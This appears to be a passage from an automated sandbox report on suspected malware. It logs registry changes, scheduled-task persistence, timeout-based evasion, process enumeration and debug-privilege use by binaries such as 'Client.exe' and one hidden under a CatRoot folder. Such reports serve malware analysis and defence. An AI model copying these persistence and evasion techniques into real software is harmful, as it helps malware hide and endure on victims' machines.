Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Software\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Internet Explorer\GPU C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{674F56E8-E6F9-473E-BEA6-AA3F33CEE9ED} C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\pulse x loader.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\tesetey.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Client.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\CatRoot\$SXR\$SXR.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
N/A N/A C:\Windows\explorer.exe N/A
